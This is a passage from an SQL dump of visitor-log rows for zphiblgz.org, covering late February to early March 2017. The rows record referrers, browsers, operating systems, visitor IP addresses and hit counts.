','Chrome','Linux','43.0.2357.130','','185.161.96.6','000',1,0),(1316,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.159.29.212','000',1,0),(1317,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.48.220','000',1,0),(1318,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.46.0.33','000',1,0),(1319,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.9.169.12','000',1,0),(1320,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','79.137.30.20','000',1,0),(1321,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.146.108.118','000',1,0),(1322,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.38.125','000',1,0),(1323,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.72.97.95','000',1,0),(1324,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.191.158.174','000',2,0),(1325,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','128.199.241.178','000',1,0),(1326,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','119.81.50.204','000',1,0),(1327,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','212.227.107.160','000',1,0),(1328,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.40.28.9','000',1,0),(1329,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','92.53.114.59','000',1,0),(1330,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.235.77.205','000',1,0),(1331,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','197.221.2.180','000',1,0),(1332,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','89.42.193.238','000',1,0),(1333,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.185.220.12','000',1,0),(1334,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','188.40.1.198','000',1,0),(1335,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','197.221.10.179','000',1,0),(1336,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.38.133','000',1,0),(1337,'2017-02-26','http://zphiblgz.org','Firefox','Windows','40.1','','109.217.29.99','000',1,0),(1338,'2017-02-26','https://www.google.com/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',7,0),(1339,'2017-02-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(1340,'2017-02-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(1341,'2017-02-26','http://zphiblgz.org/','Chrome','iPad','56.0.2924.79','','174.205.14.58','000',1,0),(1342,'2017-02-26','http://zphiblgz.org/','Chrome','Android','47.0.2526.83','','166.137.240.64','000',1,0),(1343,'2017-02-26','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','9.0.2','','172.73.134.85','000',3,0),(1344,'2017-02-26','https://www.google.com/','Chrome','Windows','56.0.2924.87','','69.140.137.173','000',3,0),(1345,'2017-02-26','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.125','000',1,0),(1346,'2017-02-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.123','000',1,0),(1347,'2017-02-26','http://zphiblgz.org','Firefox','Windows','29.0','','217.122.242.83','000',2,0),(1348,'2017-02-26','http://zphiblgz.org','Chrome','Android','52.0.2743.98','','174.205.17.76','000',2,0),(1349,'2017-02-26','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','68.64.168.22','000',1,0),(1350,'2017-02-26','https://www.google.com/','Chrome','Windows','56.0.2924.87','','68.33.70.75','000',1,0),(1351,'2017-02-27','https://www.google.com/','Chrome','Android','56.0.2924.87','','71.196.25.153','000',1,0),(1352,'2017-02-27','http://zphiblgz.org/scholarship/','Chrome','Windows','56.0.2924.87','','68.134.22.152','000',1,0),(1353,'2017-02-27','http://zphiblgz.org','Safari','iPhone','6.0','','218.30.103.81','000',1,0),(1354,'2017-02-27','https://www.google.com/','Safari','Macintosh','10.0.3','','71.178.49.187','000',3,0),(1355,'2017-02-27','https://www.google.com/','Safari','iPhone','10.0','','174.194.18.53','000',1,0),(1356,'2017-02-27','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','188.165.196.25','000',81,0),(1357,'2017-02-27','http://zphiblgz.org','Firefox','Windows','40.1','','185.6.150.236','000',2,0),(1358,'2017-02-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','94.102.60.76','000',5,0),(1359,'2017-02-27','https://search.yahoo.com/','Chrome','Macintosh','54.0.2840.98','','165.230.224.111','000',1,0),(1360,'2017-02-27','http://zphiblgz.org','Firefox','Windows','40.1','','79.113.229.209','000',1,0),(1361,'2017-02-27','http://zphiblgz.org','MSIE','Windows','7.0','','52.2.31.136','000',1,0),(1362,'2017-02-27','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.92','000',6,0),(1363,'2017-02-27','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(1364,'2017-02-27','http://zphiblgz.org/','Chrome','Windows','41.0.2220.0','','75.68.154.3','000',4,0),(1365,'2017-02-27','http://zphiblgz.org','Safari','iPhone','600.1.4','','50.225.39.92','000',1,0),(1366,'2017-02-27','http://zphiblgz.org','Safari','Macintosh','10.0.3','','50.225.39.91','000',1,0),(1367,'2017-02-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','186.202.188.234','000',2,0),(1368,'2017-02-27','http://zphiblgz.org','Firefox','Windows','29.0','','213.34.69.164','000',2,0),(1369,'2017-02-27','http://zphiblgz.org','Firefox','Windows','40.1','','177.41.111.103','000',1,0),(1370,'2017-02-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(1371,'2017-02-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(1372,'2017-02-27','http://zphiblgz.org/','Chrome','Windows','44.0.2403.125','','95.211.138.129','000',1,0),(1373,'2017-02-27','http://zphiblgz.org','Firefox','Windows','40.1','','103.15.245.166','000',1,0),(1374,'2017-02-27','http://zphiblgz.org','Safari','iPad','10.0','','73.173.91.7','000',3,0),(1375,'2017-02-27','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','69.143.140.209','000',2,0),(1376,'2017-02-27','http://zphiblgz.org','Firefox','Macintosh','49.0','','138.238.233.106','000',4,0),(1377,'2017-02-27','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.179.165.166','000',4,0),(1378,'2017-02-27','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.54','000',3,0),(1379,'2017-02-27','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.144','000',1,0),(1380,'2017-02-27','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','77.244.214.7','000',2,0),(1381,'2017-02-27','http://zphiblgz.org','Firefox','Windows','40.1','','196.210.165.51','000',2,0),(1382,'2017-02-27','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.179.98.218','000',7,0),(1383,'2017-02-27','http://zphiblgz.org','Microsoft','Unknown','Unknown','','71.179.98.218','000',2,0),(1384,'2017-02-27','http://zphiblgz.org','MSIE','Windows','7.0','','71.179.98.218','000',2,0),(1385,'2017-02-27','http://zphiblgz.org','MSIE','Windows','11.0','','71.179.98.218','000',1,0),(1386,'2017-02-27','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','77.244.213.129','000',2,0),(1387,'2017-02-27','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','77.244.214.31','000',2,0),(1388,'2017-02-27','http://zphiblgz.org','Chrome','Linux','48.0.2564.10','','108.48.105.39','000',1,0),(1389,'2017-02-27','http://zphiblgz.org','MSIE','Windows','6.0','','65.208.151.117','000',6,0),(1390,'2017-02-27','http://zphiblgz.org','MSIE','Windows','6.0','','65.208.151.118','000',5,0),(1391,'2017-02-27','http://www.zphiblgz.org/scholarship','MSIE','Windows','6.0','','65.208.151.114','000',13,0),(1392,'2017-02-27','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.112','000',6,0),(1393,'2017-02-27','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.115','000',5,0),(1394,'2017-02-27','http://zphiblgz.org','Chrome','Chrome OS','55.0.2883.103','','73.173.37.218','000',8,0),(1395,'2017-02-27','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.119','000',3,0),(1396,'2017-02-27','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.132.242.241','000',9,0),(1397,'2017-02-27','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.113','000',5,0),(1398,'2017-02-27','http://zphiblgz.org','Chrome','Linux','37.0.2123.37','','23.81.233.192','000',2,0),(1399,'2017-02-27','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','68.64.168.22','000',1,0),(1400,'2017-02-27','http://zphiblgz.org/wp-content/themes/hopeful/js/jquery.prettyphoto.js?ver=1488244832','MSIE','Windows','6.0','','65.208.151.116','000',5,0),(1401,'2017-02-27','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(1402,'2017-02-27','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.195.140','000',1,0),(1403,'2017-02-27','http://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(1404,'2017-02-27','http://zphiblgz.org','Firefox','Windows','40.1','','111.61.66.108','000',2,0),(1405,'2017-02-27','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.156','000',1,0),(1406,'2017-02-28','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.112','000',3,0),(1407,'2017-02-28','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.117','000',5,0),(1408,'2017-02-28','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.118','000',2,0),(1409,'2017-02-28','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','73.21.29.87','000',5,0),(1410,'2017-02-28','http://zphiblgz.org','Firefox','Windows','40.1','','88.117.122.7','000',2,0),(1411,'2017-02-28','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.114','000',4,0),(1412,'2017-02-28','http://zphiblgz.org','redback','Unknown','v0','','109.236.8.6','000',2,0),(1413,'2017-02-28','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.113','000',2,0),(1414,'2017-02-28','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','65.208.151.115','000',2,0),(1415,'2017-02-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.56.71.53','000',1,0),(1416,'2017-02-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','94.102.60.76','000',5,0),(1417,'2017-02-28','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.172.58.81','000',4,0),(1418,'2017-02-28','http://www.google.com/search?site=&source=hp&ei=HIK1WLm1AuWn6ATCv7KQCQ&q=zeta+phi+beta+columbia%2C+md+chapter&oq=zeta+phi+beta+columbia%2C+md+chapter&gs_l=mobile-gws-hp.12..33i22i29i30k1.36275.65490.0.66824.35.35.0.6.6.0.1563.20638.3-5j14j5j8j2j1.35.0..2..0...1c.1.64.mobile-gws-hp..4.31.14243.3..0j5j41j0i131k1j0i22i30k1j33i160k1j33i21k1.28QdIoICQnI','Android Browser','Android','4.0','','128.177.161.162','000',1,0),(1419,'2017-02-28','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.204.1.198','000',1,0),(1420,'2017-02-28','http://zphiblgz.org','Chrome','Android','47.0.2526.83','','128.177.161.162','000',2,0),(1421,'2017-02-28','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',8,0),(1422,'2017-02-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.91','000',1,0),(1423,'2017-02-28','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.204.21.99','000',1,0),(1424,'2017-02-28','https://www.google.com','Firefox','Windows','45.0','','8.44.100.11','000',3,0),(1425,'2017-02-28','http://zphiblgz.org','Chrome','Android','51.0.2704.81','','173.46.76.161','000',3,0),(1426,'2017-02-28','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(1427,'2017-02-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.80','000',4,0),(1428,'2017-02-28','http://zphiblgz.org','MSIE','Windows','11.0','','23.229.104.238','000',1,0),(1429,'2017-02-28','https://www.google.com/','Chrome','Windows','56.0.2924.87','','134.192.191.243','000',2,0),(1430,'2017-02-28','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.225.39.92','000',1,0),(1431,'2017-02-28','http://r.search.yahoo.com/_ylt=AwrEWDY72rJYC08AW_Fx.9w4;_ylu=X3oDMTE0dW1qc2s1BGNvbG8DYmYxBHBvcwMxBHZ0aWQDVUkyRkJUMl8xBHNlYwNzcg--/RV=2/RE=1488145083/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=qdlWWU4fbszvW3t69eWtESZ36hE-','Safari','iPhone','10.0','','166.137.244.114','000',1,0),(1432,'2017-02-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(1433,'2017-02-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(1434,'2017-02-28','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwji4L6V2rPSAhWHxVQKHRouAXMQFggaMAA&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q&bvm=bv.148073327,d.eWE','MSIE','Windows','11.0','','138.26.234.204','000',1,0),(1435,'2017-02-28','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',14,0),(1436,'2017-02-28','zphiblgz.org','Firefox','Windows','22.0','','93.125.99.36','000',1,0),(1437,'2017-02-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.34.192.192','000',1,0),(1438,'2017-02-28','http://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',10,0),(1439,'2017-02-28','http://zphiblgz.org','Safari','iPhone','10.0','','96.231.6.64','000',1,0),(1440,'2017-03-01','http://zphiblgz.org','libwww-perl','Unknown','6.15','','185.81.158.129','000',1,0),(1441,'2017-03-01','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','73.129.20.13','000',21,0),(1442,'2017-03-01','http://zphiblgz.org','Firefox','Windows','40.1','','24.155.229.124','000',1,0),(1443,'2017-03-01','https://www.google.com/','Chrome','Windows','56.0.2924.87','','24.196.66.194','000',3,0),(1444,'2017-03-01','http://zphiblgz.org','Android Browser','Android','4.0','','68.33.93.222','000',2,0),(1445,'2017-03-01','http://zphiblgz.org','Safari','iPhone','10.0','','50.164.59.70','000',1,0),(1446,'2017-03-01','android-app://com.google.android.gm','Chrome','Android','56.0.2924.87','','172.58.185.108','000',1,0),(1447,'2017-03-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.56.71.57','000',1,0),(1448,'2017-03-01','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','128.8.35.203','000',6,0),(1449,'2017-03-01','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','104.223.112.68','000',1,0),(1450,'2017-03-01','http://zphiblgz.org','Chrome','Windows','45.0.2454.93','','123.125.67.226','000',1,0),(1451,'2017-03-01','http://zphiblgz.org','Firefox','Windows','51.0','','204.126.132.241','000',18,0),(1452,'2017-03-01','http://zphiblgz.org','MSIE','Windows','8.0','','198.51.197.209','000',1,0),(1453,'2017-03-01','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.4.108','000',1,0),(1454,'2017-03-01','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','174.205.15.20','000',3,0),(1455,'2017-03-01','http://zphiblgz.org','Firefox','Windows','27.0','','97.82.197.241','000',1,0),(1456,'2017-03-01','http://zphiblgz.org','Lynx','Unknown','2.8.8dev.3','','35.185.64.230','000',1,0),(1457,'2017-03-01','http://zphiblgz.org','MSIE','Windows','11.0','','155.220.250.114','000',1,0),(1458,'2017-03-01','http://zphiblgz.org','MSIE','Windows','11.0','','214.36.0.135','000',2,0),(1459,'2017-03-01','http://zphiblgz.org/includes/logo_img.php','Chrome','Windows','42.0.2311.152','','51.15.10.29','000',1,0),(1460,'2017-03-01','http://zphiblgz.org','scrapy-redis','Unknown','Unknown','','125.39.222.253','000',1,0),(1461,'2017-03-01','http://www.zphiblgz.org/application%20','Chrome','Windows','48.0.2564.109','','89.238.176.114','000',4,0),(1462,'2017-03-01','https://www.google.com/','Chrome','Windows','56.0.2924.87','','71.127.147.231','000',6,0),(1463,'2017-03-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(1464,'2017-03-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(1465,'2017-03-01','https://www.google.com/','Chrome','Windows','56.0.2924.87','','99.99.46.230','000',3,0),(1466,'2017-03-01','https://www.google.com/','Safari','iPhone','10.0','','73.132.228.56','000',2,0),(1467,'2017-03-01','http://zphiblgz.org','Safari','iPhone','10.0','','68.33.74.100','000',4,0),(1468,'2017-03-01','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.8','000',2,0),(1469,'2017-03-01','http://zphiblgz.org','Firefox','Windows','24.0','','213.239.205.118','000',6,0),(1470,'2017-03-01','http://zphiblgz.org','Firefox','Windows','40.1','','169.149.13.193','000',1,0),(1471,'2017-03-01','http://zphiblgz.org','Safari','iPhone','10.0','','173.69.172.136','000',8,0),(1472,'2017-03-01','http://zphiblgz.org','Firefox','Windows','28.0','','88.198.22.8','000',1,0),(1473,'2017-03-01','http://zphiblgz.org','MSIE','Windows','9.0','','144.76.80.151','000',7,0),(1474,'2017-03-01','http://zphiblgz.org','Safari','iPhone','10.0','','204.126.132.241','000',1,0),(1475,'2017-03-01','http://zphiblgz.org','Firefox','Windows','40.1','','46.109.87.166','000',2,0),(1476,'2017-03-01','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.159.82.37','000',1,0),(1477,'2017-03-01','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','68.33.93.52','000',4,0),(1478,'2017-03-01','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','100.16.228.103','000',2,0),(1479,'2017-03-01','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','68.33.73.115','000',1,0),(1480,'2017-03-02','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.243.178','000',3,0),(1481,'2017-03-02','http://zphiblgz.org','MSIE','Windows','6.0','','46.99.25.79','000',1,0),(1482,'2017-03-02','http://zphiblgz.org','MSIE','Windows','6.0','','117.201.134.77','000',1,0),(1483,'2017-03-02','http://zphiblgz.org','MSIE','Windows','6.0','','119.157.109.6','000',1,0),(1484,'2017-03-02','http://zphiblgz.org','python-requests','Unknown','2.3.0','','54.87.142.37','000',1,0),(1485,'2017-03-02','http://zphiblgz.org','Firefox','Windows','10.0.1','','91.250.15.107','000',1,0),(1486,'2017-03-02','http://zphiblgz.org','Firefox','Windows','10.0.1','','31.202.212.95','000',1,0),(1487,'2017-03-02','http://zphiblgz.org','Firefox','Windows','10.0.1','','31.202.241.227','000',1,0),(1488,'2017-03-02','http://zphiblgz.org','Safari','Linux','534.7','','35.166.93.13','000',1,0),(1489,'2017-03-02','http://zphiblgz.org/','Firefox','Windows','34.0','','94.177.201.117','000',4,0),(1490,'2017-03-02','http://zphiblgz.org','Android Browser','Android','4.0','','68.33.78.180','000',3,0),(1491,'2017-03-02','http://m.facebook.com/','Chrome','Android','52.0.2743.98','','172.58.184.78','000',2,0),(1492,'2017-03-02','http://zphiblgz.org','Safari','iPhone','10.0','','166.137.244.29','000',2,0),(1493,'2017-03-02','http://zphiblgz.org','Chrome','Windows','4.0.222.3','','52.38.105.80','000',2,0),(1494,'2017-03-02','http://zphiblgz.org/','Firefox','Windows','34.0','','204.12.240.34','000',4,0),(1495,'2017-03-02','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Firefox','Windows','34.0','','198.12.121.55','000',2,0),(1496,'2017-03-02','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','174.205.15.20','000',1,0),(1497,'2017-03-02','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',4,0),(1498,'2017-03-02','https://www.google.com/','Chrome','Android','56.0.2924.87','','172.58.185.255','000',3,0),(1499,'2017-03-02','zphiblgz.org','Chrome','Windows','50.0.2661.75','','71.184.66.204','000',5,0),(1500,'2017-03-02','zphiblgz.org','Chrome','Windows','50.0.2661.75','','80.70.5.26','000',5,0),(1501,'2017-03-02','http://zphiblgz.org','Chrome','Windows','26.0.1410.58','','5.9.112.6','000',1,0),(1502,'2017-03-02','http://zphiblgz.org','Firefox','Windows','11.0','','5.9.145.132','000',1,0),(1503,'2017-03-02','http://zphiblgz.org','Firefox','Windows','40.1','','79.178.54.17','000',1,0),(1504,'2017-03-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(1505,'2017-03-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(1506,'2017-03-02','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.80.117.53','000',1,0),(1507,'2017-03-02','http://zphiblgz.org/','MSIE','Windows','6.0','','176.110.245.139','000',1,0),(1508,'2017-03-02','https://www.google.com/','Chrome','Chrome OS','55.0.2883.105','','76.100.172.42','000',4,0),(1509,'2017-03-02','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(1510,'2017-03-02','android-app://com.google.android.googlequicksearchbox','Chrome','Android','56.0.2924.87','','107.77.68.66','000',5,0),(1511,'2017-03-02','http://zphiblgz.org','Android Browser','Android','4.0','','173.46.78.178','000',3,0),(1512,'2017-03-02','http://zphiblgz.org/','Chrome','Android','56.0.2924.87','','69.137.148.3','000',1,0),(1513,'2017-03-02','http://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.209.33.250','000',2,0),(1514,'2017-03-02','https://www.google.com/','Chrome','Android','51.0.2704.106','','69.140.29.25','000',1,0),(1515,'2017-03-03','http://zphiblgz.org','Pinterest','Unknown','0.2','','54.236.1.13','000',1,0),(1516,'2017-03-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','103.252.188.6','000',1,0),(1517,'2017-03-03','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','24.0.1312.57','','5.61.33.81','000',1,0),(1518,'2017-03-03','http://zphiblgz.org/wp-admin/','MSIE','Windows','9.0','','5.61.33.81','000',1,0),(1519,'2017-03-03','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(1520,'2017-03-03','http://zphiblgz.org','MSIE','Windows','10.0','','1.171.167.126','000',1,0),(1521,'2017-03-03','http://zphiblgz.org','Firefox','Windows','29.0','','134.19.230.221','000',2,0),(1522,'2017-03-03','http://zphiblgz.org','Chrome','Windows','41.0.2224.3','','195.22.127.139','000',2,0),(1523,'2017-03-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','64.137.191.94','000',2,0),(1524,'2017-03-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','185.80.51.11','000',2,0),(1525,'2017-03-03','http://zphiblgz.org','Firefox','Windows','40.1','','93.187.39.142','000',2,0),(1526,'2017-03-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','178.62.214.121','000',1,0),(1527,'2017-03-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','139.59.0.115','000',1,0),(1528,'2017-03-03','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','204.126.132.241','000',4,0),(1529,'2017-03-03','http://zphiblgz.org','Microsoft','Unknown','Unknown','','204.126.132.241','000',6,0),(1530,'2017-03-03','http://zphiblgz.org','MSIE','Windows','7.0','','204.126.132.241','000',6,0),(1531,'2017-03-03','http://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',2,0),(1532,'2017-03-03','http://zphiblgz.org','Safari','iPhone','10.0','','50.164.59.70','000',4,0),(1533,'2017-03-03','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.164.59.70','000',1,0),(1534,'2017-03-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(1535,'2017-03-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(1536,'2017-03-03','http://zphiblgz.org','Firefox','Windows','35.0','','204.12.240.34','000',1,0),(1537,'2017-03-03','http://zphiblgz.org/','Chrome','Android','56.0.2924.87','','172.58.184.221','000',1,0),(1538,'2017-03-03','https://www.google.com/','Firefox','Windows','51.0','','98.117.51.14','000',2,0),(1539,'2017-03-03','https://www.google.com/','Safari','iPad','10.0','','100.15.151.52','000',2,0),(1540,'2017-03-03','zphiblgz.org','Firefox','Windows','4.0b7pre','','80.92.164.204','000',1,0),(1541,'2017-03-03','https://www.google.com/','Safari','iPhone','10.0','','100.15.151.52','000',5,0),(1542,'2017-03-03','https://www.google.com/','Safari','iPhone','10.0','','72.81.227.12','000',5,0),(1543,'2017-03-03','http://zphiblgz.org','Firefox','Windows','40.1','','125.166.194.134','000',1,0),(1544,'2017-03-03','http://zphiblgz.org','Firefox','Windows','40.1','','41.136.251.19','000',1,0),(1545,'2017-03-04','http://zphiblgz.org','Firefox','Windows','40.1','','179.180.108.227','000',2,0),(1546,'2017-03-04','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','50.164.59.70','000',6,0),(1547,'2017-03-04','http://zphiblgz.org/members/','Safari','iPad','10.0','','100.15.151.52','000',5,0),(1548,'2017-03-04','http://zphiblgz.org','Firefox','Macintosh','29.0','','54.161.89.211','000',1,0),(1549,'2017-03-04','http://r.search.yahoo.com/_ylt=AwrBT79Lb7pYI.wAqjRx.9w4;_ylu=X3oDMTByaWg0YW05BGNvbG8DYmYxBHBvcwM4BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1488641996/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=E80eRqe.thoSJ6bu.TfcUQ2GobY-','Safari','iPhone','8.0','','166.216.165.17','000',1,0),(1550,'2017-03-04','https://www.google.com/','Safari','iPhone','600.1.4','','208.54.4.210','000',1,0),(1551,'2017-03-04','http://zphiblgz.org','Firefox','Windows','40.1','','2.86.55.106','000',2,0),(1552,'2017-03-04','http://zphiblgz.org','Firefox','Windows','10.0.1','','91.250.15.107','000',1,0),(1553,'2017-03-04','http://zphiblgz.org/','Chrome','Android','56.0.2924.87','','69.137.148.3','000',1,0),(1554,'2017-03-04','http://zphiblgz.org','Firefox','Windows','40.1','','93.113.80.84','000',1,0),(1555,'2017-03-04','http://zphiblgz.org','Firefox','Windows','40.1','','194.38.115.171','000',1,0),(1556,'2017-03-04','http://zphiblgz.org','Firefox','Windows','40.1','','181.208.205.144','000',1,0),(1557,'2017-03-04','https://www.bing.com/','Edge','Windows','14.14393','','99.14.250.200','000',3,0),(1558,'2017-03-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','186.202.151.78','000',1,0),(1559,'2017-03-04','http://zphiblgz.org','Firefox','Windows','40.1','','210.186.98.10','000',1,0),(1560,'2017-03-04','http://zphiblgz.org','Chrome','Windows','48.0.2564.116','','31.202.212.95','000',1,0),(1561,'2017-03-04','http://zphiblgz.org','Firefox','Windows','10.0.1','','31.202.241.227','000',1,0),(1562,'2017-03-04','http://zphiblgz.org','Safari','iPhone','10.0','','174.200.1.246','000',3,0),(1563,'2017-03-04','http://zphiblgz.org','Firefox','Windows','40.1','','86.218.167.172','000',1,0),(1564,'2017-03-04','http://zphiblgz.org','Firefox','Windows','29.0','','134.19.230.83','000',2,0),(1565,'2017-03-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.44','000',1,0),(1566,'2017-03-04','https://www.google.com/','Chrome','Macintosh','54.0.2840.98','','128.4.72.217','000',2,0),(1567,'2017-03-04','https://www.google.com/','Chrome','Android','44.0.2403.133','','68.33.94.53','000',15,0),(1568,'2017-03-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(1569,'2017-03-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(1570,'2017-03-04','https://www.google.com/','Safari','iPhone','10.0','','70.194.14.71','000',1,0),(1571,'2017-03-04','http://zphiblgz.org','Firefox','Windows','45.0','','77.93.2.151','000',1,0),(1572,'2017-03-04','http://zphiblgz.org','Chrome','Windows','52.0.2743.116','','144.217.80.113','000',1,0),(1573,'2017-03-04','https://www.bing.com/','Silk','Kindle 